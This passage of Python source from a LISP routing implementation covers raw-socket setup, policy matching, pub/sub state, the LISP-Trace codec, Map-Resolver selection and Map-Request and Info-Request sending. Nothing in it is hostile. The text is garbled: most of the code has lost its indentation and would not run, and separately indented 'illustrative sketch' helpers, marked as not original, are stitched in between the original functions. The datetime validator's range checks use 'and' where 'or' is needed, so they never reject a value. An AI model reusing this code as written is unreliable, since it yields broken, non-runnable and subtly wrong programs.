key = self.ms_name + self.map_server.print_address()
if (key not in lisp_map_servers_list): return
lisp_map_servers_list.pop(key)
#enddef
#endclass
class lisp_interface(object):
def __init__(self, device):
self.interface_name = ""
self.device = device
self.instance_id = None
self.bridge_socket = None
self.raw_socket = None
self.dynamic_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.dynamic_eid_device = None
self.dynamic_eid_timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
self.multi_tenant_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#enddef
def add_interface(self):
lisp_myinterfaces[self.device] = self
#enddef
def get_instance_id(self):
return(self.instance_id)
#enddef
def get_socket(self):
return(self.raw_socket)
#enddef
def get_bridge_socket(self):
return(self.bridge_socket)
#enddef
def does_dynamic_eid_match(self, eid):
if (self.dynamic_eid.is_null()): return(False)
return(eid.is_more_specific(self.dynamic_eid))
#enddef
def set_socket(self, device):
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
s.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
try:
s.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, device)
except:
s.close()
s = None
#endtry
self.raw_socket = s
#enddef
def set_bridge_socket(self, device):
s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
try:
            s.bind((device, 0))
            self.bridge_socket = s
except:
return
#endtry
#enddef
#endclass
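#
# Illustrative sketch (not part of the original code) of what
# lisp_interface.set_socket() sets up: a raw IP socket that supplies its own
# IP header and is pinned to one egress device with SO_BINDTODEVICE. It
# requires root privileges and Linux; on Python 3 the device name must be
# passed as bytes, which is why .encode() is used here. The function name is
# an example only.
#
def lisp_example_raw_socket(device):
    s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
    s.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
    try:
        s.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE,
            device.encode())
    except:
        s.close()
        return(None)
    #endtry
    return(s)
#enddef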
class lisp_datetime(object):
def __init__(self, datetime_str):
self.datetime_name = datetime_str
self.datetime = None
self.parse_datetime()
#enddef
def valid_datetime(self):
ds = self.datetime_name
if (ds.find(":") == -1): return(False)
if (ds.find("-") == -1): return(False)
year, month, day, time = ds[0:4], ds[5:7], ds[8:10], ds[11::]
if ((year + month + day).isdigit() == False): return(False)
if (month < "01" and month > "12"): return(False)
if (day < "01" and day > "31"): return(False)
hour, mi, sec = time.split(":")
if ((hour + mi + sec).isdigit() == False): return(False)
if (hour < "00" and hour > "23"): return(False)
if (mi < "00" and mi > "59"): return(False)
if (sec < "00" and sec > "59"): return(False)
return(True)
#enddef
def parse_datetime(self):
dt = self.datetime_name
dt = dt.replace("-", "")
dt = dt.replace(":", "")
self.datetime = int(dt)
#enddef
def now(self):
ts = datetime.datetime.now().strftime("%Y-%m-%d-%H:%M:%S")
ts = lisp_datetime(ts)
return(ts)
#enddef
def print_datetime(self):
return(self.datetime_name)
#enddef
def future(self):
return(self.datetime > self.now().datetime)
#enddef
def past(self):
return(self.future() == False)
#enddef
def now_in_range(self, upper):
return(self.past() and upper.future())
#enddef
def this_year(self):
now = str(self.now().datetime)[0:4]
ts = str(self.datetime)[0:4]
return(ts == now)
#enddef
def this_month(self):
now = str(self.now().datetime)[0:6]
ts = str(self.datetime)[0:6]
return(ts == now)
#enddef
def today(self):
now = str(self.now().datetime)[0:8]
ts = str(self.datetime)[0:8]
return(ts == now)
#enddef
#endclass
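#
# lisp_example_datetime_window
#
# Illustrative sketch only; this hypothetical helper is not called anywhere.
# It builds a policy time window from two lisp_datetime() bounds in
# "year-month-day-hour:min:sec" format and tests if "now" falls inside it.
#
def lisp_example_datetime_window():
    lower = lisp_datetime("2020-01-01-00:00:00")
    upper = lisp_datetime("2030-12-31-23:59:59")
    if (lower.valid_datetime() == False): return(False)
    if (upper.valid_datetime() == False): return(False)
    return(lower.now_in_range(upper))
#enddef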
#
# Policy data structures.
#
class lisp_policy_match(object):
def __init__(self):
self.source_eid = None
self.dest_eid = None
self.source_rloc = None
self.dest_rloc = None
self.rloc_record_name = None
self.geo_name = None
self.elp_name = None
self.rle_name = None
self.json_name = None
self.datetime_lower = None
self.datetime_upper = None
#endclass
class lisp_policy(object):
def __init__(self, policy_name):
self.policy_name = policy_name
self.match_clauses = []
self.set_action = None
self.set_record_ttl = None
self.set_source_eid = None
self.set_dest_eid = None
self.set_rloc_address = None
self.set_rloc_record_name = None
self.set_geo_name = None
self.set_elp_name = None
self.set_rle_name = None
self.set_json_name = None
#enddef
def match_policy_map_request(self, mr, srloc):
for m in self.match_clauses:
p = m.source_eid
t = mr.source_eid
if (p and t and t.is_more_specific(p) == False): continue
p = m.dest_eid
t = mr.target_eid
if (p and t and t.is_more_specific(p) == False): continue
p = m.source_rloc
t = srloc
if (p and t and t.is_more_specific(p) == False): continue
l = m.datetime_lower
u = m.datetime_upper
if (l and u and l.now_in_range(u) == False): continue
return(True)
#endfor
return(False)
#enddef
def set_policy_map_reply(self):
all_none = (self.set_rloc_address == None and
self.set_rloc_record_name == None and self.set_geo_name == None and
self.set_elp_name == None and self.set_rle_name == None)
if (all_none): return(None)
rloc = lisp_rloc()
if (self.set_rloc_address):
rloc.rloc.copy_address(self.set_rloc_address)
addr = rloc.rloc.print_address_no_iid()
lprint("Policy set-rloc-address to {}".format(addr))
#endif
if (self.set_rloc_record_name):
rloc.rloc_name = self.set_rloc_record_name
name = blue(rloc.rloc_name, False)
lprint("Policy set-rloc-record-name to {}".format(name))
#endif
if (self.set_geo_name):
rloc.geo_name = self.set_geo_name
name = rloc.geo_name
not_found = "" if (name in lisp_geo_list) else \
"(not configured)"
lprint("Policy set-geo-name '{}' {}".format(name, not_found))
#endif
if (self.set_elp_name):
rloc.elp_name = self.set_elp_name
name = rloc.elp_name
not_found = "" if (name in lisp_elp_list) else \
"(not configured)"
lprint("Policy set-elp-name '{}' {}".format(name, not_found))
#endif
if (self.set_rle_name):
rloc.rle_name = self.set_rle_name
name = rloc.rle_name
not_found = "" if (name in lisp_rle_list) else \
"(not configured)"
lprint("Policy set-rle-name '{}' {}".format(name, not_found))
#endif
if (self.set_json_name):
rloc.json_name = self.set_json_name
name = rloc.json_name
not_found = "" if (name in lisp_json_list) else \
"(not configured)"
lprint("Policy set-json-name '{}' {}".format(name, not_found))
#endif
return(rloc)
#enddef
def save_policy(self):
lisp_policies[self.policy_name] = self
#enddef
#endclass
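#
# lisp_example_apply_policy
#
# Illustrative sketch only; this hypothetical helper is not called anywhere.
# If one of the policy's match clauses accepts the Map-Request, return the
# overriding lisp_rloc() built from the policy's set-* values, else None.
#
def lisp_example_apply_policy(policy, map_request, source_rloc):
    if (policy.match_policy_map_request(map_request, source_rloc) == False):
        return(None)
    #endif
    return(policy.set_policy_map_reply())
#enddef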
class lisp_pubsub(object):
def __init__(self, itr, port, nonce, ttl, xtr_id):
self.itr = itr
self.port = port
self.nonce = nonce
self.uptime = lisp_get_timestamp()
self.ttl = ttl
self.xtr_id = xtr_id
self.map_notify_count = 0
self.eid_prefix = None
#enddef
def add(self, eid_prefix):
self.eid_prefix = eid_prefix
ttl = self.ttl
eid = eid_prefix.print_prefix()
if (eid not in lisp_pubsub_cache):
lisp_pubsub_cache[eid] = {}
#endif
pubsub = lisp_pubsub_cache[eid]
ar = "Add"
if (self.xtr_id in pubsub):
ar = "Replace"
del(pubsub[self.xtr_id])
#endif
pubsub[self.xtr_id] = self
eid = green(eid, False)
itr = red(self.itr.print_address_no_iid(), False)
xtr_id = "0x" + lisp_hex_string(self.xtr_id)
lprint("{} pubsub state {} for {}, xtr-id: {}, ttl {}".format(ar, eid,
itr, xtr_id, ttl))
#enddef
def delete(self, eid_prefix):
eid = eid_prefix.print_prefix()
itr = red(self.itr.print_address_no_iid(), False)
xtr_id = "0x" + lisp_hex_string(self.xtr_id)
if (eid in lisp_pubsub_cache):
pubsub = lisp_pubsub_cache[eid]
if (self.xtr_id in pubsub):
pubsub.pop(self.xtr_id)
lprint("Remove pubsub state {} for {}, xtr-id: {}".format(eid,
itr, xtr_id))
#endif
#endif
#enddef
#endclass
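#
# lisp_example_add_subscriber
#
# Illustrative sketch only; this hypothetical helper is not called anywhere.
# It caches a subscription in lisp_pubsub_cache{}, which is keyed first by
# EID-prefix string and then by xtr-id, exactly as lisp_pubsub.add() does.
#
def lisp_example_add_subscriber(itr, port, nonce, ttl, xtr_id, eid_prefix):
    ps = lisp_pubsub(itr, port, nonce, ttl, xtr_id)
    ps.add(eid_prefix)
    return(ps)
#enddef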
#
# lisp_trace
#
# The LISP-Trace message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=9 | 0 | Local Private Port |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Local Private IPv4 RLOC |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_trace(object):
def __init__(self):
self.nonce = lisp_get_control_nonce()
self.packet_json = []
self.local_rloc = None
self.local_port = None
self.lisp_socket = None
#enddef
def print_trace(self):
jd = self.packet_json
lprint("LISP-Trace JSON: '{}'".format(jd))
#enddef
def encode(self):
first_long = socket.htonl(0x90000000)
packet = struct.pack("II", first_long, 0)
packet += struct.pack("Q", self.nonce)
packet += json.dumps(self.packet_json)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
first_long = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
if ((first_long & 0xff000000) != 0x90000000): return(False)
if (len(packet) < format_size): return(False)
addr = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
addr = socket.ntohl(addr)
v1 = addr >> 24
v2 = (addr >> 16) & 0xff
v3 = (addr >> 8) & 0xff
v4 = addr & 0xff
self.local_rloc = "{}.{}.{}.{}".format(v1, v2, v3, v4)
self.local_port = str(first_long & 0xffff)
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
self.nonce = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (len(packet) == 0): return(True)
try:
self.packet_json = json.loads(packet)
except:
return(False)
        #endtry
return(True)
#enddef
def myeid(self, eid):
return(lisp_is_myeid(eid))
#enddef
def return_to_sender(self, lisp_socket, rts_rloc, packet):
rloc, port = self.rtr_cache_nat_trace_find(rts_rloc)
if (rloc == None):
rloc, port = rts_rloc.split(":")
port = int(port)
lprint("Send LISP-Trace to address {}:{}".format(rloc, port))
else:
lprint("Send LISP-Trace to translated address {}:{}".format(rloc,
port))
#endif
if (lisp_socket == None):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(("0.0.0.0", LISP_TRACE_PORT))
s.sendto(packet, (rloc, port))
s.close()
else:
lisp_socket.sendto(packet, (rloc, port))
#endif
#enddef
def packet_length(self):
udp = 8; trace = 4 + 4 + 8
return(udp + trace + len(json.dumps(self.packet_json)))
#enddef
def rtr_cache_nat_trace(self, translated_rloc, translated_port):
key = self.local_rloc + ":" + self.local_port
value = (translated_rloc, translated_port)
lisp_rtr_nat_trace_cache[key] = value
lprint("Cache NAT Trace addresses {} -> {}".format(key, value))
#enddef
def rtr_cache_nat_trace_find(self, local_rloc_and_port):
key = local_rloc_and_port
try: value = lisp_rtr_nat_trace_cache[key]
except: value = (None, None)
return(value)
#enddef
#endclass
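#
# lisp_example_trace_first_longs
#
# Illustrative sketch only; this hypothetical helper is not called anywhere.
# It packs and unpacks the first two longs of the LISP-Trace header diagrammed
# above using only struct/socket, mirroring what lisp_trace.decode() does.
#
def lisp_example_trace_first_longs(port, ipv4_string):
    first_long = 0x90000000 | (port & 0xffff)
    b1, b2, b3, b4 = [int(b) for b in ipv4_string.split(".")]
    second_long = (b1 << 24) | (b2 << 16) | (b3 << 8) | b4
    packed = struct.pack("II", socket.htonl(first_long),
        socket.htonl(second_long))
    #
    # Decode side, as in lisp_trace.decode().
    #
    f, s = struct.unpack("II", packed)
    f = socket.ntohl(f)
    s = socket.ntohl(s)
    local_port = str(f & 0xffff)
    local_rloc = "{}.{}.{}.{}".format(s >> 24, (s >> 16) & 0xff,
        (s >> 8) & 0xff, s & 0xff)
    return([local_rloc, local_port])
#enddef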
#------------------------------------------------------------------------------
#
# lisp_get_map_server
#
# Return a lisp_ms() class instance. Variable 'address' is a lisp_address()
# class instance.
#
def lisp_get_map_server(address):
for ms in list(lisp_map_servers_list.values()):
if (ms.map_server.is_exact_match(address)): return(ms)
#endfor
return(None)
#enddef
#
# lisp_get_any_map_server
#
# Return the first lisp_ms() class instance.
#
def lisp_get_any_map_server():
for ms in list(lisp_map_servers_list.values()): return(ms)
return(None)
#enddef
#
# lisp_get_map_resolver
#
# Get least recently used Map-Resolver if address is not supplied. Variable
# 'eid' takes on 3 values, an EID value in the form of lisp_address(), None,
# or "". Value "" means to use any MR, like the first one. Value None means
# to use a map-resolver-name that has not been configured (i.e. "all").
#
def lisp_get_map_resolver(address, eid):
if (address != None):
addr = address.print_address()
mr = None
for key in lisp_map_resolvers_list:
if (key.find(addr) == -1): continue
mr = lisp_map_resolvers_list[key]
#endfor
return(mr)
#endif
#
# Get database-mapping entry to find out which map-resolver name set we
# should use, or pick one from a non-configured mr-name list. Or, get the
# first one for info-requests.
#
if (eid == ""):
mr_name = ""
elif (eid == None):
mr_name = "all"
else:
db = lisp_db_for_lookups.lookup_cache(eid, False)
mr_name = "all" if db == None else db.use_mr_name
#endif
older = None
for mr in list(lisp_map_resolvers_list.values()):
if (mr_name == ""): return(mr)
if (mr.mr_name != mr_name): continue
if (older == None or mr.last_used < older.last_used): older = mr
#endfor
return(older)
#enddef
#
# lisp_get_decent_map_resolver
#
# Get the Map-Resolver based on the LISP-Decent pull mapping system lookup
# algorithm
#
def lisp_get_decent_map_resolver(eid):
index = lisp_get_decent_index(eid)
dns_name = str(index) + "." + lisp_decent_dns_suffix
lprint("Use LISP-Decent map-resolver {} for EID {}".format( \
bold(dns_name, False), eid.print_prefix()))
older = None
for mr in list(lisp_map_resolvers_list.values()):
if (dns_name != mr.dns_name): continue
if (older == None or mr.last_used < older.last_used): older = mr
#endfor
return(older)
#enddef
#
# lisp_ipv4_input
#
# Process IPv4 data packet for input checking.
#
def lisp_ipv4_input(packet):
#
    # Check for an IGMP packet first. Don't verify the IP checksum or test TTL.
#
if (ord(packet[9:10]) == 2): return([True, packet])
#
# Now calculate checksum for verification.
#
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum == 0):
dprint("Packet arrived with checksum of 0!")
else:
packet = lisp_ip_checksum(packet)
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum != 0):
dprint("IPv4 header checksum failed for inner header")
packet = lisp_format_packet(packet[0:20])
dprint("Packet header: {}".format(packet))
return([False, None])
#endif
#endif
#
# Now check TTL and if not 0, recalculate checksum and return to
# encapsulate.
#
ttl = struct.unpack("B", packet[8:9])[0]
if (ttl == 0):
dprint("IPv4 packet arrived with ttl 0, packet discarded")
return([False, None])
elif (ttl == 1):
dprint("IPv4 packet {}, packet discarded".format( \
bold("ttl expiry", False)))
return([False, None])
#endif
ttl -= 1
packet = packet[0:8] + struct.pack("B", ttl) + packet[9::]
packet = packet[0:10] + struct.pack("H", 0) + packet[12::]
packet = lisp_ip_checksum(packet)
return([False, packet])
#enddef
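#
# lisp_example_ipv4_input_usage
#
# Illustrative sketch only; this hypothetical helper is not called anywhere.
# It shows how a caller interprets the [flag, packet] return convention of
# lisp_ipv4_input(): a True flag means an IGMP packet that bypassed the
# TTL/checksum checks, a None packet means the packet was discarded, and
# otherwise the packet has its TTL decremented and checksum recomputed.
#
def lisp_example_ipv4_input_usage(packet):
    igmp, packet = lisp_ipv4_input(packet)
    if (igmp): return(packet)
    if (packet == None): return(None)
    return(packet)
#enddef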
#
# lisp_ipv6_input
#
# Process IPv6 data packet for input checking.
#
def lisp_ipv6_input(packet):
dest = packet.inner_dest
packet = packet.packet
#
# Now check TTL and if not 0, recalculate checksum and return to
# encapsulate.
#
ttl = struct.unpack("B", packet[7:8])[0]
if (ttl == 0):
dprint("IPv6 packet arrived with hop-limit 0, packet discarded")
return(None)
elif (ttl == 1):
dprint("IPv6 packet {}, packet discarded".format( \
bold("ttl expiry", False)))
return(None)
#endif
#
# Check for IPv6 link-local addresses. They should not go on overlay.
#
if (dest.is_ipv6_link_local()):
dprint("Do not encapsulate IPv6 link-local packets")
return(None)
#endif
ttl -= 1
packet = packet[0:7] + struct.pack("B", ttl) + packet[8::]
return(packet)
#enddef
#
# lisp_mac_input
#
# Process MAC data frame for input checking. All we need to do is get the
# destination MAC address.
#
def lisp_mac_input(packet):
return(packet)
#enddef
#
# lisp_rate_limit_map_request
#
# Check to see if we have sent a data-triggered Map-Request in the last
# LISP_MAP_REQUEST_RATE_LIMIT seconds. Return True if we should not send
# a Map-Request (rate-limit it).
#
def lisp_rate_limit_map_request(dest):
now = lisp_get_timestamp()
#
# Do we have rate-limiting disabled temporarily?
#
elapsed = now - lisp_no_map_request_rate_limit
if (elapsed < LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME):
left = int(LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME - elapsed)
dprint("No Rate-Limit Mode for another {} secs".format(left))
return(False)
#endif
#
    # Did we send a Map-Request recently?
#
if (lisp_last_map_request_sent == None): return(False)
elapsed = now - lisp_last_map_request_sent
rate_limit = (elapsed < LISP_MAP_REQUEST_RATE_LIMIT)
if (rate_limit):
dprint("Rate-limiting Map-Request for {}, sent {} secs ago".format( \
green(dest.print_address(), False), round(elapsed, 3)))
#endif
return(rate_limit)
#enddef
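#
# lisp_example_data_triggered_map_request
#
# Illustrative sketch only; this hypothetical helper is not called anywhere.
# The typical data-triggered pattern is to consult the rate-limiter before
# building a Map-Request for a destination EID.
#
def lisp_example_data_triggered_map_request(lisp_sockets, port, seid, deid):
    if (lisp_rate_limit_map_request(deid)): return(False)
    lisp_send_map_request(lisp_sockets, port, seid, deid, None)
    return(True)
#enddef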
#
# lisp_send_map_request
#
# From this process, build and send a Map-Request for supplied EID.
#
def lisp_send_map_request(lisp_sockets, lisp_ephem_port, seid, deid, rloc,
pubsub=False):
global lisp_last_map_request_sent
#
# Set RLOC-probe parameters if caller wants Map-Request to be an
    # RLOC-probe. We use probe_port 4341 so the ITR and RTR keying data
    # structures can be the same.
#
probe_dest = probe_port = None
if (rloc):
probe_dest = rloc.rloc
probe_port = rloc.translated_port if lisp_i_am_rtr else LISP_DATA_PORT
#endif
#
# If there are no RLOCs found, do not build and send the Map-Request.
#
itr_rloc4, itr_rloc6, device = lisp_myrlocs
if (itr_rloc4 == None):
lprint("Suppress sending Map-Request, IPv4 RLOC not found")
return
#endif
if (itr_rloc6 == None and probe_dest != None and probe_dest.is_ipv6()):
lprint("Suppress sending Map-Request, IPv6 RLOC not found")
return
#endif
map_request = lisp_map_request()
map_request.record_count = 1
map_request.nonce = lisp_get_control_nonce()
map_request.rloc_probe = (probe_dest != None)
map_request.subscribe_bit = pubsub
map_request.xtr_id_present = pubsub
#
# Hold request nonce so we can match replies from xTRs that have multiple
    # RLOCs. The reason is that the reply's source address may not be the
    # probed destination. And in our ETR implementation, we can get the probe
    # request destination in the lisp-core/lisp-etr/lisp-rtr processes.
#
if (rloc): rloc.last_rloc_probe_nonce = map_request.nonce
sg = deid.is_multicast_address()
if (sg):
map_request.target_eid = seid
map_request.target_group = deid
else:
map_request.target_eid = deid
#endif
#
# If lookup is for an IPv6 EID or there is a signature key configured and
# there is a private key file in current directory, tell lisp_map_request()
# to sign Map-Request. For an RTR, we want to verify its map-request
# signature, so it needs to include its own IPv6 EID that matches the
# private-key file.
#
if (map_request.rloc_probe == False):
db = lisp_get_signature_eid()
if (db):
map_request.signature_eid.copy_address(db.eid)
map_request.privkey_filename = "./lisp-sig.pem"
#endif
#endif
#
# Fill in source-eid field.
#
if (seid == None or sg):
map_request.source_eid.afi = LISP_AFI_NONE
else:
map_request.source_eid = seid
#endif
#
# If ITR-RLOC is a private IPv4 address, we need it to be a global address
# for RLOC-probes.
#
# However, if we are an RTR and have a private address, the RTR is behind
# a NAT. The RLOC-probe is encapsulated with source-port 4341 to get
# through NAT. The ETR receiving the RLOC-probe request must return the
# RLOC-probe reply with same translated address/port pair (the same values
# when it encapsulates data packets).
#
if (probe_dest != None and lisp_nat_traversal and lisp_i_am_rtr == False):
if (probe_dest.is_private_address() == False):
itr_rloc4 = lisp_get_any_translated_rloc()
#endif
if (itr_rloc4 == None):
lprint("Suppress sending Map-Request, translated RLOC not found")
return
#endif
#endif
#
# Fill in ITR-RLOCs field. If we don't find an IPv6 address there is
# nothing to store in the ITR-RLOCs list. And we have to use an inner
# source address of 0::0.
#
if (probe_dest == None or probe_dest.is_ipv4()):
if (lisp_nat_traversal and probe_dest == None):
ir = lisp_get_any_translated_rloc()
if (ir != None): itr_rloc4 = ir
#endif
map_request.itr_rlocs.append(itr_rloc4)
#endif
if (probe_dest == None or probe_dest.is_ipv6()):
if (itr_rloc6 == None or itr_rloc6.is_ipv6_link_local()):
itr_rloc6 = None
else:
map_request.itr_rloc_count = 1 if (probe_dest == None) else 0
map_request.itr_rlocs.append(itr_rloc6)
#endif
#endif
#
# Decide what inner source address needs to be for the ECM. We have to
# look at the address-family of the destination EID. If the destination-EID
# is a MAC address, we will use IPv4 in the inner header with a destination
# address of 0.0.0.0.
#
if (probe_dest != None and map_request.itr_rlocs != []):
itr_rloc = map_request.itr_rlocs[0]
else:
if (deid.is_ipv4()):
itr_rloc = itr_rloc4
elif (deid.is_ipv6()):
itr_rloc = itr_rloc6
else:
itr_rloc = itr_rloc4
#endif
#endif
#
# And finally add one EID record. The EID we are looking up.
#
packet = map_request.encode(probe_dest, probe_port)
map_request.print_map_request()
#
# If this is an RLOC-probe, send directly to RLOC and not to mapping
# system. If the RLOC is behind a NAT, we need to data encapsulate it
# from port 4341 to translated destination address and port.
#
if (probe_dest != None):
if (rloc.is_rloc_translated()):
nat_info = lisp_get_nat_info(probe_dest, rloc.rloc_name)
#
# Handle gleaned RLOC case.
#
if (nat_info == None):
r = rloc.rloc.print_address_no_iid()
g = "gleaned-{}".format(r)
p = rloc.translated_port
nat_info = lisp_nat_info(r, g, p)
#endif
lisp_encapsulate_rloc_probe(lisp_sockets, probe_dest, nat_info,
packet)
return
#endif
if (probe_dest.is_ipv4() and probe_dest.is_multicast_address()):
dest = probe_dest
else:
addr_str = probe_dest.print_address_no_iid()
dest = lisp_convert_4to6(addr_str)
#endif
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#endif
#
# Get least recently used Map-Resolver. In the RTR make sure there is a
# Map-Resolver in lisp.config with no mr-name or mr-name=all.
#
local_eid = None if lisp_i_am_rtr else seid
if (lisp_decent_pull_xtr_configured()):
mr = lisp_get_decent_map_resolver(deid)
else:
mr = lisp_get_map_resolver(None, local_eid)
#endif
if (mr == None):
lprint("Cannot find Map-Resolver for source-EID {}".format( \
green(seid.print_address(), False)))
return
#endif
mr.last_used = lisp_get_timestamp()
mr.map_requests_sent += 1
if (mr.last_nonce == 0): mr.last_nonce = map_request.nonce
#
# Send ECM based Map-Request to Map-Resolver.
#
if (seid == None): seid = itr_rloc
lisp_send_ecm(lisp_sockets, packet, seid, lisp_ephem_port, deid,
mr.map_resolver)
#
# Set global timestamp for Map-Request rate-limiting.
#
lisp_last_map_request_sent = lisp_get_timestamp()
#
# Do DNS lookup for Map-Resolver if "dns-name" configured.
#
mr.resolve_dns_name()
return
#enddef
#
# lisp_send_info_request
#
# Send info-request to any map-server configured or to an address supplied
# by the caller.
#
def lisp_send_info_request(lisp_sockets, dest, port, device_name):
#
# Build Info-Request message.
#
info = lisp_info()
info.nonce = lisp_get_control_nonce()
if (device_name): info.hostname += "-" + device_name
addr_str = dest.print_address_no_iid()
#
# Find next-hop for interface 'device_name' if supplied. The "ip route"
# command will produce this:
#
# pi@lisp-pi ~/lisp $ ip route | egrep "default via"
# default via 192.168.1.1 dev eth1
# default via 192.168.1.1 dev wlan0
#
# We then turn the line we want into a "ip route add" command. Then at
# the end of this function we remove the route.
#
    # We do this on the ETR only so the lisp-itr and lisp-etr processes don't
    # both add and delete host routes (for Info-Request sending purposes) at
    # the same time.
#
added_route = False
if (device_name):
save_nh = lisp_get_host_route_next_hop(addr_str)
#
# If we found a host route for the map-server, then both the lisp-itr
# and lisp-etr processes are in this routine at the same time.
        # We wait for the host route to go away before proceeding. We use
        # the map-server host route as an IPC lock. For the data port, only
        # the lisp-etr process will add a host route to the RTR for Info-
        # Requests.
#
if (port == LISP_CTRL_PORT and save_nh != None):
while (True):
time.sleep(.01)
save_nh = lisp_get_host_route_next_hop(addr_str)
if (save_nh == None): break
#endwhile
#endif
default_routes = lisp_get_default_route_next_hops()
for device, nh in default_routes:
if (device != device_name): continue
#
# If there is a data route pointing to same next-hop, don't
# change the routing table. Otherwise, remove saved next-hop,
# add the one we want and later undo this.
#
if (save_nh != nh):
if (save_nh != None):
lisp_install_host_route(addr_str, save_nh, False)
#endif
lisp_install_host_route(addr_str, nh, True)
added_route = True
#endif
break
#endfor
#endif
#
# Encode the Info-Request message and print it.
#
packet = info.encode()
info.print_info()
#
# Send it.
#
cd = "(for control)" if port == LISP_CTRL_PORT else "(for data)"
cd = bold(cd, False)
p = bold("{}".format(port), False)
a = red(addr_str, False)
rtr = "RTR " if port == LISP_DATA_PORT else "MS "
lprint("Send Info-Request to {}{}, port {} {}".format(rtr, a, p, cd))
#
# Send packet to control port via control-sockets interface. For a 4341
# do the same via the lisp-core process but prepend a LISP data header
# to the message.
#
if (port == LISP_CTRL_PORT):
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
else:
header = lisp_data_header()
header.instance_id(0xffffff)
header = header.encode()
if (header):
packet = header + packet
#
# The NAT-traversal spec says to use port 4342 as the source port
# but that would mean return data packets will go to the lisp-core
# process. We are going to use an ephemeral port here so packets
# come to this lisp-etr process. The commented out call is to
# allow Info-Requests to use source port 4342 but will break the
# data-plane in this lispers.net implementation.
#
lisp_send(lisp_sockets, dest, LISP_DATA_PORT, packet)
# lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
#endif
#endif
#
# Remove static route to RTR if had added one and restore data route.
#
if (added_route):
lisp_install_host_route(addr_str, None, False)
if (save_nh != None): lisp_install_host_route(addr_str, save_nh, True)
#endif
return
#enddef
#
# lisp_process_info_request
#
# Process received Info-Request message. Return a Info-Reply to sender.
#
def lisp_process_info_request(lisp_sockets, packet, addr_str, sport, rtr_list):
#
# Parse Info-Request so we can return the nonce in the Info-Reply.
#
info = lisp_info()
packet = info.decode(packet)
if (packet == None): return
info.print_info()
#
# Start building the Info-Reply. Copy translated source and translated
# source port from Info-Request.
#
info.info_reply = True
info.global_etr_rloc.store_address(addr_str)
info.etr_port = sport
#
# Put Info-Request hostname (if it was encoded) in private-rloc in
# Info-Reply. Encode it as an AFI=17 distinguished-name.
#
if (info.hostname != None):
info.private_etr_rloc.afi = LISP_AFI_NAME
info.private_etr_rloc.store_address(info.hostname)
#endif
if (rtr_list != None): info.rtr_list = rtr_list
packet = info.encode()
info.print_info()
#
# Send the Info-Reply via the lisp-core process. We are sending from
# a udp46 socket, so we need to prepend ::ffff.
#
lprint("Send Info-Reply to {}".format(red(addr_str, False)))
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, sport, packet)
#
# Cache info sources so we can decide to process Map-Requests from it
# specially so we can proxy-Map-Request when the sources are behind NATs.
#
info_source = lisp_info_source(info.hostname, addr_str, sport)
info_source.cache_address_for_info_source()
return
#enddef
#
# lisp_get_signature_eid
#
# Go through the lisp_db_list (database-mappings) and return the first entry
# with signature-eid is True.
#
def lisp_get_signature_eid():
for db in lisp_db_list:
if (db.signature_eid): return(db)
#endfor
return(None)
#enddef
#
# lisp_get_any_translated_port
#
# Find a translated port so we can set it to the inner UDP port number for
# ECM Map-Requests.
#
def lisp_get_any_translated_port():
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.translated_rloc.is_null()): continue
return(rloc_entry.translated_port)
#endfor
#endfor
return(None)
#enddef
#
# lisp_get_any_translated_rloc
#
# Find a translated RLOC in any lisp_mapping() from the lisp_db_list. We need
# this to store in an RLE for (S,G) Map-Registers when the ETR is behind NAT
# devices.
#
def lisp_get_any_translated_rloc():
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.translated_rloc.is_null()): continue
return(rloc_entry.translated_rloc)
#endfor
#endfor
return(None)
#enddef
#
# lisp_get_all_translated_rlocs
#
# Return an array of each translated RLOC address in string format.
#
def lisp_get_all_translated_rlocs():
rloc_list = []
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.is_rloc_translated() == False): continue
addr = rloc_entry.translated_rloc.print_address_no_iid()
rloc_list.append(addr)
#endfor
#endfor
return(rloc_list)
#enddef
#
# lisp_update_default_routes
#
# We are an ITR and we received a new RTR-list from the Map-Server. Update
